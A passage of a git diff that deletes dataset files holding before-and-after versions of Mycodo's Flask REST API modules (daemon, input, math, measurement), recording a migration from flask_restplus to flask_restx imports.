control.ram_use() - virtualenv = control.is_in_virtualenv() - if status == 'alive': - return { - 'is_running': True, - 'RAM': ram, - 'python_virtual_env': virtualenv - }, 200 - except Exception: - return { - 'is_running': False, - 'RAM': None, - 'python_virtual_env': None - }, 200 - - -@ns_daemon.route('/terminate') -@ns_daemon.doc(security='apikey', responses=default_responses) -class DaemonTerminate(Resource): - """Checks information about the daemon""" - - @accept('application/vnd.mycodo.v1+json') - @ns_daemon.marshal_with(daemon_terminate_fields) - @flask_login.login_required - def post(self): - """Shut down the daemon""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - try: - control = DaemonControl() - terminate = control.terminate_daemon() - if terminate: - return {'terminated': terminate}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.diff b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.diff deleted file mode 100644 index a138b80..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.diff +++ /dev/null @@ -1,17 +0,0 @@ -diff --git a/mycodo/mycodo_flask/api/input.py b/mycodo/mycodo_flask/api/input.py - index 7e208d0c5c86d0d627c541ea4ec68e95e2b84870..516917351d7d8341375db4481ac72910c9510a42 100644 - --- a/mycodo/mycodo_flask/api/input.py - +++ b/mycodo/mycodo_flask/api/input.py -@@ -4,9 +4,9 @@ import traceback - - import flask_login - from flask_accept import accept --from flask_restplus import Resource --from flask_restplus import abort --from flask_restplus import fields -+from flask_restx import Resource -+from flask_restx import abort -+from flask_restx import fields - - from mycodo.databases.models import DeviceMeasurements - from mycodo.databases.models import Input diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.source.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.source.py deleted file mode 100644 index 519b66f..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.source.py +++ /dev/null @@ -1,120 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restplus import Resource -from flask_restplus import abort -from flask_restplus import fields - -from mycodo.databases.models import DeviceMeasurements -from mycodo.databases.models import Input -from mycodo.databases.models.input import InputSchema -from mycodo.databases.models.measurement import DeviceMeasurementsSchema -from mycodo.mycodo_client import DaemonControl -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.api.sql_schema_fields import device_measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import input_fields -from mycodo.mycodo_flask.api.utils import get_from_db -from mycodo.mycodo_flask.api.utils import return_list_of_dictionaries -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_input = api.namespace('inputs', description='Input operations') - -input_single_fields = api.model('Input Status Fields', { - 'input settings': fields.Nested(input_fields), - 'device measurements': fields.List( - fields.Nested(device_measurement_fields)), -}) - -input_list_fields = 
api.model('Input Fields List', { - 'input settings': fields.List(fields.Nested(input_fields)), -}) - - -@ns_input.route('/') -@ns_input.doc(security='apikey', responses=default_responses) -class Inputs(Resource): - """Input information""" - - @accept('application/vnd.mycodo.v1+json') - @ns_input.marshal_with(input_list_fields) - @flask_login.login_required - def get(self): - """Show all input settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(InputSchema, Input) - if list_data: - return {'input settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_input.route('/<string:unique_id>') -@ns_input.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the input'} -) -class SettingsInputsUniqueID(Resource): - """Interacts with input settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_input.marshal_with(input_single_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for an input""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(InputSchema, Input, unique_id=unique_id) - - measure_schema = DeviceMeasurementsSchema() - list_data = return_list_of_dictionaries( - measure_schema.dump( - DeviceMeasurements.query.filter_by( - device_id=unique_id).all(), many=True)) - - return {'input settings': dict_data, - 'device measurements': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_input.route('/<string:unique_id>/force-measurement') -@ns_input.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the input.'} -) -class InputsUniqueID(Resource): - """Input with Unique ID""" - - @accept('application/vnd.mycodo.v1+json') - @flask_login.login_required - def post(self, unique_id): - """Force an input to acquire measurements""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - try: - control = DaemonControl() - return_ = control.input_force_measurements(unique_id) - if return_[0]: - return {'message': return_[1]}, 460 - else: - return {'message': return_[1]}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.target.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.target.py deleted file mode 100644 index 5bacf34..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.target.py +++ /dev/null @@ -1,120 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restx import Resource -from flask_restx import abort -from flask_restx import fields - -from mycodo.databases.models import DeviceMeasurements -from mycodo.databases.models import Input -from mycodo.databases.models.input import InputSchema -from mycodo.databases.models.measurement import DeviceMeasurementsSchema -from mycodo.mycodo_client import DaemonControl -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.api.sql_schema_fields import device_measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import input_fields -from mycodo.mycodo_flask.api.utils import get_from_db
-from mycodo.mycodo_flask.api.utils import return_list_of_dictionaries -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_input = api.namespace('inputs', description='Input operations') - -input_single_fields = api.model('Input Status Fields', { - 'input settings': fields.Nested(input_fields), - 'device measurements': fields.List( - fields.Nested(device_measurement_fields)), -}) - -input_list_fields = api.model('Input Fields List', { - 'input settings': fields.List(fields.Nested(input_fields)), -}) - - -@ns_input.route('/') -@ns_input.doc(security='apikey', responses=default_responses) -class Inputs(Resource): - """Input information""" - - @accept('application/vnd.mycodo.v1+json') - @ns_input.marshal_with(input_list_fields) - @flask_login.login_required - def get(self): - """Show all input settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(InputSchema, Input) - if list_data: - return {'input settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_input.route('/<string:unique_id>') -@ns_input.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the input'} -) -class SettingsInputsUniqueID(Resource): - """Interacts with input settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_input.marshal_with(input_single_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for an input""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(InputSchema, Input, unique_id=unique_id) - - measure_schema = DeviceMeasurementsSchema() - list_data = return_list_of_dictionaries( - measure_schema.dump( - DeviceMeasurements.query.filter_by( - device_id=unique_id).all(), many=True)) - - return {'input settings': dict_data, - 'device measurements': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_input.route('/<string:unique_id>/force-measurement') -@ns_input.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the input.'} -) -class InputsUniqueID(Resource): - """Input with Unique ID""" - - @accept('application/vnd.mycodo.v1+json') - @flask_login.login_required - def post(self, unique_id): - """Force an input to acquire measurements""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - try: - control = DaemonControl() - return_ = control.input_force_measurements(unique_id) - if return_[0]: - return {'message': return_[1]}, 460 - else: - return {'message': return_[1]}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.diff b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.diff deleted file mode 100644 index fe1ff8b..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.diff +++ /dev/null @@ -1,17 +0,0 @@ -diff --git a/mycodo/mycodo_flask/api/math.py b/mycodo/mycodo_flask/api/math.py - index 7e208d0c5c86d0d627c541ea4ec68e95e2b84870..516917351d7d8341375db4481ac72910c9510a42 100644 - --- a/mycodo/mycodo_flask/api/math.py - +++ b/mycodo/mycodo_flask/api/math.py -@@ -4,9 +4,9 @@ import traceback - - import flask_login - from flask_accept import accept
--from flask_restplus import Resource --from flask_restplus import abort --from flask_restplus import fields -+from flask_restx import Resource -+from flask_restx import abort -+from flask_restx import fields - - from mycodo.databases.models import DeviceMeasurements - from mycodo.databases.models import Math diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.source.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.source.py deleted file mode 100644 index bdbfa4e..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.source.py +++ /dev/null @@ -1,90 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restplus import Resource -from flask_restplus import abort -from flask_restplus import fields - -from mycodo.databases.models import DeviceMeasurements -from mycodo.databases.models import Math -from mycodo.databases.models.math import MathSchema -from mycodo.databases.models.measurement import DeviceMeasurementsSchema -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.api.sql_schema_fields import device_measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import math_fields -from mycodo.mycodo_flask.api.utils import get_from_db -from mycodo.mycodo_flask.api.utils import return_list_of_dictionaries -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_math = api.namespace('maths', description='Math operations') - -math_single_fields = api.model('Math Status Fields', { - 'math settings': fields.Nested(math_fields), - 'device measurements': fields.List( - fields.Nested(device_measurement_fields)), -}) - -math_list_fields = api.model('Math Fields List', { - 'math settings': fields.List(fields.Nested(math_fields)), -}) - - -@ns_math.route('/') -@ns_math.doc(security='apikey', responses=default_responses) -class Maths(Resource): - """Math information""" - - @accept('application/vnd.mycodo.v1+json') - @ns_math.marshal_with(math_list_fields) - @flask_login.login_required - def get(self): - """Show all math settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(MathSchema, Math) - if list_data: - return {'math settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_math.route('/<string:unique_id>') -@ns_math.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the math'} -) -class SettingsMathsUniqueID(Resource): - """Interacts with math settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_math.marshal_with(math_single_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a math""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(MathSchema, Math, unique_id=unique_id) - - measure_schema = DeviceMeasurementsSchema() - list_data = return_list_of_dictionaries( - measure_schema.dump( - DeviceMeasurements.query.filter_by( - device_id=unique_id).all(), many=True)) - - return {'math settings': dict_data, - 'device measurements': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git
a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.target.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.target.py deleted file mode 100644 index 89ba4b7..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.target.py +++ /dev/null @@ -1,90 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restx import Resource -from flask_restx import abort -from flask_restx import fields - -from mycodo.databases.models import DeviceMeasurements -from mycodo.databases.models import Math -from mycodo.databases.models.math import MathSchema -from mycodo.databases.models.measurement import DeviceMeasurementsSchema -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.api.sql_schema_fields import device_measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import math_fields -from mycodo.mycodo_flask.api.utils import get_from_db -from mycodo.mycodo_flask.api.utils import return_list_of_dictionaries -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_math = api.namespace('maths', description='Math operations') - -math_single_fields = api.model('Math Status Fields', { - 'math settings': fields.Nested(math_fields), - 'device measurements': fields.List( - fields.Nested(device_measurement_fields)), -}) - -math_list_fields = api.model('Math Fields List', { - 'math settings': fields.List(fields.Nested(math_fields)), -}) - - -@ns_math.route('/') -@ns_math.doc(security='apikey', responses=default_responses) -class Maths(Resource): - """Math information""" - - @accept('application/vnd.mycodo.v1+json') - @ns_math.marshal_with(math_list_fields) - @flask_login.login_required - def get(self): - """Show all math settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(MathSchema, Math) - if list_data: - return {'math settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_math.route('/<string:unique_id>') -@ns_math.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the math'} -) -class SettingsMathsUniqueID(Resource): - """Interacts with math settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_math.marshal_with(math_single_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a math""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(MathSchema, Math, unique_id=unique_id) - - measure_schema = DeviceMeasurementsSchema() - list_data = return_list_of_dictionaries( - measure_schema.dump( - DeviceMeasurements.query.filter_by( - device_id=unique_id).all(), many=True)) - - return {'math settings': dict_data, - 'device measurements': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.diff b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.diff deleted file mode 100644 index 1b80daf..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.diff +++ /dev/null @@ -1,17 +0,0 @@ -diff --git
a/mycodo/mycodo_flask/api/measurement.py b/mycodo/mycodo_flask/api/measurement.py - index 7e208d0c5c86d0d627c541ea4ec68e95e2b84870..516917351d7d8341375db4481ac72910c9510a42 100644 - --- a/mycodo/mycodo_flask/api/measurement.py - +++ b/mycodo/mycodo_flask/api/measurement.py -@@ -5,9 +5,9 @@ import traceback - - import flask_login - from flask_accept import accept --from flask_restplus import Resource --from flask_restplus import abort --from flask_restplus import fields -+from flask_restx import Resource -+from flask_restx import abort -+from flask_restx import fields - - from mycodo.mycodo_flask.api import api - from mycodo.mycodo_flask.api import default_responses diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.source.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.source.py deleted file mode 100644 index bc8b65d..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.source.py +++ /dev/null @@ -1,313 +0,0 @@ -# coding=utf-8 -import datetime -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restplus import Resource -from flask_restplus import abort -from flask_restplus import fields - -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.utils import utils_general -from mycodo.utils.influx import read_influxdb_function -from mycodo.utils.influx import read_influxdb_list -from mycodo.utils.influx import read_influxdb_single -from mycodo.utils.influx import valid_date_str -from mycodo.utils.influx import write_influxdb_value - -logger = logging.getLogger(__name__) - -ns_measurement = api.namespace( - 'measurements', description='Measurement operations') - -measurement_create_fields = ns_measurement.model('Measurement Create Fields', { - 'timestamp': fields.DateTime( - description='The timestamp of the measurement, in %Y-%m-%dT%H:%M:%S.%fZ format ' - '(e.g. 2019-04-15T18:07:00.392Z). 
(Optional; exclude to create a ' - 'measurement with a timestamp of the current time)', - dt_format='iso8601', - required=False) -}) - -measurement_fields = ns_measurement.model('Measurement Fields', { - 'time': fields.DateTime(dt_format='iso8601'), - 'value': fields.Float, -}) - -measurement_list_fields = ns_measurement.model('Measurement Fields List', { - 'measurements': fields.List(fields.Nested(measurement_fields)), -}) - -measurement_function_fields = ns_measurement.model('Measurement Function Fields', { - 'value': fields.Float, -}) - - -@ns_measurement.route('/create/<string:unique_id>/<string:unit>/<int:channel>/<value>') -@ns_measurement.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the measurement', - 'unit': 'The unit of the measurement', - 'channel': 'The channel of the measurement', - 'value': 'the value of the measurement' - } -) -class MeasurementsCreate(Resource): - """Interacts with Measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_measurement.expect(measurement_create_fields) - @flask_login.login_required - def post(self, unique_id, unit, channel, value): - """Create a measurement""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - if channel < 0: - abort(422, custom='channel must be >= 0') - - try: - value = float(value) - except: - abort(422, custom='value does not represent a float') - - timestamp = None - if ns_measurement.payload and 'timestamp' in ns_measurement.payload: - ts = ns_measurement.payload["timestamp"] - if ts is not None: - if valid_date_str(ts): - timestamp = datetime.datetime.strptime( - ts, '%Y-%m-%dT%H:%M:%S.%fZ') - else: - abort(422, custom='Invalid timestamp format. Must be formatted as %Y-%m-%dT%H:%M:%S.%fZ') - - try: - return_ = write_influxdb_value( - unique_id, unit, value, channel=channel, timestamp=timestamp) - - if return_: - abort(500) - else: - return {'message': 'Success'}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_measurement.route('/historical/<string:unique_id>/<string:unit>/<int:channel>/<int:epoch_start>/<int:epoch_end>') -@ns_measurement.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the measurement', - 'unit': 'The unit of the measurement', - 'channel': 'The channel of the measurement', - 'epoch_start': 'The start time, as epoch. Set to 0 for none.', - 'epoch_end': 'The start time, as epoch. Set to 0 for none.'
- } -) -class MeasurementsHistorical(Resource): - """Interacts with Measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_measurement.marshal_with(measurement_list_fields) - @flask_login.login_required - def get(self, unique_id, unit, channel, epoch_start, epoch_end): - """ - Return a list of measurements found within a time range - """ - if not utils_general.user_has_permission('view_settings'): - abort(403) - - if channel < 0: - abort(422, custom='channel must be >= 0') - if epoch_start < 0 or epoch_end < 0: - abort(422, custom='epoch_start and epoch_end must be >= 0') - - utc_offset_timedelta = datetime.datetime.utcnow() - datetime.datetime.now() - - if epoch_start: - start = datetime.datetime.fromtimestamp(float(epoch_start)) - start += utc_offset_timedelta - start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ') - else: - start_str = None - - if epoch_end: - end = datetime.datetime.fromtimestamp(float(epoch_end)) - end += utc_offset_timedelta - end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ') - else: - end_str = None - - try: - return_ = read_influxdb_list( - unique_id, unit, channel, start_str=start_str, end_str=end_str) - if return_ and len(return_) > 0: - dict_return = {'measurements': []} - for each_set in return_: - dict_return['measurements'].append( - {'time': each_set[0], 'value': each_set[1]}) - return dict_return, 200 - else: - return return_, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_measurement.route('/historical_function/<string:unique_id>/<string:unit>/<int:channel>/<int:epoch_start>/<int:epoch_end>/<string:function>') -@ns_measurement.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the measurement', - 'unit': 'The unit of the measurement', - 'channel': 'The channel of the measurement', - 'epoch_start': 'The start time, as epoch. Set to 0 for none.', - 'epoch_end': 'The start time, as epoch. Set to 0 for none.', - 'function': 'The InfluxDB function to apply to the measurements. ' - 'For example, SUM, MIN, MAX, STDDEV, etc. ' - 'See https://docs.influxdata.com/influxdb/v1.7/query_language/functions/ for more information.'
- } -) -class MeasurementsHistoricalFunction(Resource): - """Interacts with Measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_measurement.marshal_with(measurement_function_fields) - @flask_login.login_required - def get(self, unique_id, unit, channel, epoch_start, epoch_end, function): - """ - Return the value of a function of measurements found within a time range - """ - if not utils_general.user_has_permission('view_settings'): - abort(403) - - if channel < 0: - abort(422, custom='channel must be >= 0') - if epoch_start < 0 or epoch_end < 0: - abort(422, custom='epoch_start and epoch_end must be >= 0') - - utc_offset_timedelta = datetime.datetime.utcnow() - datetime.datetime.now() - - if epoch_start: - start = datetime.datetime.fromtimestamp(float(epoch_start)) - start += utc_offset_timedelta - start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ') - else: - start_str = None - - if epoch_end: - end = datetime.datetime.fromtimestamp(float(epoch_end)) - end += utc_offset_timedelta - end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ') - else: - end_str = None - - try: - return_ = read_influxdb_function( - unique_id, unit, channel, function, start_str=start_str, end_str=end_str) - if return_ and len(return_) == 2: - return {'function': function, 'value': return_[1]}, 200 - else: - return return_, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_measurement.route('/last/<string:unique_id>/<string:unit>/<int:channel>/<int:past_seconds>') -@ns_measurement.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the measurement', - 'unit': 'The unit of the measurement', - 'channel': 'The channel of the measurement', - 'past_seconds': 'How many seconds in the past to query.' - } -) -class MeasurementsLast(Resource): - """Interacts with Measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_measurement.marshal_with(measurement_fields) - @flask_login.login_required - def get(self, unique_id, unit, channel, past_seconds): - """ - Return the last measurement found within a duration from the past to the present - """ - if not utils_general.user_has_permission('view_settings'): - abort(403) - - if channel < 0: - abort(422, custom='channel must be >= 0') - if past_seconds < 1: - abort(422, custom='past_seconds must be >= 1') - - try: - return_ = read_influxdb_single( - unique_id, unit, channel, duration_sec=past_seconds) - if return_ and len(return_) == 2: - return {'time': return_[0], 'value': return_[1]}, 200 - else: - return return_, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_measurement.route('/past/<string:unique_id>/<string:unit>/<int:channel>/<int:past_seconds>') -@ns_measurement.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the measurement', - 'unit': 'The unit of the measurement', - 'channel': 'The channel of the measurement', - 'past_seconds': 'How many seconds in the past to query.'
- } -) -class MeasurementsPast(Resource): - """Interacts with Measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_measurement.marshal_with(measurement_list_fields) - @flask_login.login_required - def get(self, unique_id, unit, channel, past_seconds): - """ - Return a list of measurements found within a duration from the past to the present - """ - if not utils_general.user_has_permission('view_settings'): - abort(403) - - if channel < 0: - abort(422, custom='channel must be >= 0') - if past_seconds < 1: - abort(422, custom='past_seconds must be >= 1') - - try: - return_ = read_influxdb_list( - unique_id, unit, channel, duration_sec=past_seconds) - if return_ and len(return_) > 0: - dict_return = {'measurements': []} - for each_set in return_: - dict_return['measurements'].append( - {'time': each_set[0], 'value': each_set[1]}) - return dict_return, 200 - else: - return return_, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.target.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.target.py deleted file mode 100644 index 0b987eb..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.target.py +++ /dev/null @@ -1,313 +0,0 @@ -# coding=utf-8 -import datetime -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restx import Resource -from flask_restx import abort -from flask_restx import fields - -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.utils import utils_general -from mycodo.utils.influx import read_influxdb_function -from mycodo.utils.influx import read_influxdb_list -from mycodo.utils.influx import read_influxdb_single -from mycodo.utils.influx import valid_date_str -from mycodo.utils.influx import write_influxdb_value - -logger = logging.getLogger(__name__) - -ns_measurement = api.namespace( - 'measurements', description='Measurement operations') - -measurement_create_fields = ns_measurement.model('Measurement Create Fields', { - 'timestamp': fields.DateTime( - description='The timestamp of the measurement, in %Y-%m-%dT%H:%M:%S.%fZ format ' - '(e.g. 2019-04-15T18:07:00.392Z). 
(Optional; exclude to create a ' - 'measurement with a timestamp of the current time)', - dt_format='iso8601', - required=False) -}) - -measurement_fields = ns_measurement.model('Measurement Fields', { - 'time': fields.DateTime(dt_format='iso8601'), - 'value': fields.Float, -}) - -measurement_list_fields = ns_measurement.model('Measurement Fields List', { - 'measurements': fields.List(fields.Nested(measurement_fields)), -}) - -measurement_function_fields = ns_measurement.model('Measurement Function Fields', { - 'value': fields.Float, -}) - - -@ns_measurement.route('/create/<string:unique_id>/<string:unit>/<int:channel>/<value>') -@ns_measurement.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the measurement', - 'unit': 'The unit of the measurement', - 'channel': 'The channel of the measurement', - 'value': 'the value of the measurement' - } -) -class MeasurementsCreate(Resource): - """Interacts with Measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_measurement.expect(measurement_create_fields) - @flask_login.login_required - def post(self, unique_id, unit, channel, value): - """Create a measurement""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - if channel < 0: - abort(422, custom='channel must be >= 0') - - try: - value = float(value) - except: - abort(422, custom='value does not represent a float') - - timestamp = None - if ns_measurement.payload and 'timestamp' in ns_measurement.payload: - ts = ns_measurement.payload["timestamp"] - if ts is not None: - if valid_date_str(ts): - timestamp = datetime.datetime.strptime( - ts, '%Y-%m-%dT%H:%M:%S.%fZ') - else: - abort(422, custom='Invalid timestamp format. Must be formatted as %Y-%m-%dT%H:%M:%S.%fZ') - - try: - return_ = write_influxdb_value( - unique_id, unit, value, channel=channel, timestamp=timestamp) - - if return_: - abort(500) - else: - return {'message': 'Success'}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_measurement.route('/historical/<string:unique_id>/<string:unit>/<int:channel>/<int:epoch_start>/<int:epoch_end>') -@ns_measurement.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the measurement', - 'unit': 'The unit of the measurement', - 'channel': 'The channel of the measurement', - 'epoch_start': 'The start time, as epoch. Set to 0 for none.', - 'epoch_end': 'The start time, as epoch. Set to 0 for none.'
- } -) -class MeasurementsHistorical(Resource): - """Interacts with Measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_measurement.marshal_with(measurement_list_fields) - @flask_login.login_required - def get(self, unique_id, unit, channel, epoch_start, epoch_end): - """ - Return a list of measurements found within a time range - """ - if not utils_general.user_has_permission('view_settings'): - abort(403) - - if channel < 0: - abort(422, custom='channel must be >= 0') - if epoch_start < 0 or epoch_end < 0: - abort(422, custom='epoch_start and epoch_end must be >= 0') - - utc_offset_timedelta = datetime.datetime.utcnow() - datetime.datetime.now() - - if epoch_start: - start = datetime.datetime.fromtimestamp(float(epoch_start)) - start += utc_offset_timedelta - start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ') - else: - start_str = None - - if epoch_end: - end = datetime.datetime.fromtimestamp(float(epoch_end)) - end += utc_offset_timedelta - end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ') - else: - end_str = None - - try: - return_ = read_influxdb_list( - unique_id, unit, channel, start_str=start_str, end_str=end_str) - if return_ and len(return_) > 0: - dict_return = {'measurements': []} - for each_set in return_: - dict_return['measurements'].append( - {'time': each_set[0], 'value': each_set[1]}) - return dict_return, 200 - else: - return return_, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_measurement.route('/historical_function/<string:unique_id>/<string:unit>/<int:channel>/<int:epoch_start>/<int:epoch_end>/<string:function>') -@ns_measurement.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the measurement', - 'unit': 'The unit of the measurement', - 'channel': 'The channel of the measurement', - 'epoch_start': 'The start time, as epoch. Set to 0 for none.', - 'epoch_end': 'The start time, as epoch. Set to 0 for none.', - 'function': 'The InfluxDB function to apply to the measurements. ' - 'For example, SUM, MIN, MAX, STDDEV, etc. ' - 'See https://docs.influxdata.com/influxdb/v1.7/query_language/functions/ for more information.'
